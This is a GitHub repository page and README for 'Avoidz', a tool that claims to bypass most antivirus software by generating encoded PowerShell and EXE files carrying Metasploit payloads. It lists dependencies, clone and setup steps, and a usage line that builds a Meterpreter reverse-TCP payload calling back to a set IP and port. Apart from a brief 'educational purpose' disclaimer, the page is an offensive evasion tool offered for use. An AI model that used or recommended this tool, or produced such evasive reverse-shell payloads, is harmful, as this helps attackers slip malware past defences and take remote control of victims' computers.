Skip to content
Avoidz tool to bypass most A.V softwares
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Create README.md Jun 12, 2017
avoidz.rb
clean.sh Add files via upload Jun 12, 2017
setup.sh Update setup.sh Jun 12, 2017

README.md

Avoidz v 1.3

Author: Mascerano Bachir [ dev-labs ]

Legal Disclamer:

The author does not hold any responsibility for the bad use of this tool,
remember this is only for educational purpose.

Description:

This tool Generate encoded powershell with metasploit payloads,convert C, C#, py, go Templates to EXE's 

Screenshot:

pic1

pic2



Dependencies :

1 - metasploit-framework
2 - xterm
3 - MinGW32
4 - Monodevelop
5 - Wine
6 - Python.exe v 2.7
7 - Golang

Download/Config/Usage:

1º - Download the tool from github
     git clone https://github.com/M4sc3r4n0/avoidz.git

2º - Set setup script execution permission
     cd avoidz
     chmod +x setup.sh

3°- Run setup script
     ./setup.sh == to check dependencies

4°- Run avoidz tool == example
 ./avoidz.rb == help command
 ./avoidz.rb -h 192.168.1.3 -p 666 -m windows/meterpreter/reverse_tcp -f c1 == generate

video tutorial:

Avoidz v 1.0 old method : https://www.youtube.com/watch?v=ZilOByKkrVk

You can’t perform that action at this time.